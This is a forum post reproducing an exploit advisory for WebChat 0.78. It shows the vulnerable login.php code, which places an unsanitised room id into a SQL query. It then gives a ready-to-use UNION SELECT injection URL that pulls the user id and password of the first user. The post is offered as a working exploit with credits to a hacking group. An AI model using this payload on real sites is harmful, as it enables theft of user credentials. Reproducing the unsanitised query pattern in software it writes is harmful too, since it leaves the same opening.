Jump to content
zbeng

WebChat 0.78 - SQL Injection

Recommended Posts

Posted
#########################################################################
#
# [webchat 0.78]
#
# Class: SQL Injection
# Published 28/06/2007
# Remote: Yes
# Critical Level : Dangerous
# Site: [url]http://sourceforge.net/projects/webdev-webchat/[/url]
# Download: [url]http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0[/url]
# Author: R00T[ATI]
# Contact: [email]r00t.ati@gmail.com[/email] - [url]http://inclusionhunter.altervista.org/index.php[/url]
#
#########################################################################


Vulnerable code:
login.php
======================================================
<?
$q = new DB_Chat;
$q->query("select * from room where rid='$rid'");
if ($q->next_record()) {
?>
=======================================================

Exploit :
============================================================================================================
[url]http://www.site.com/[/url][web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...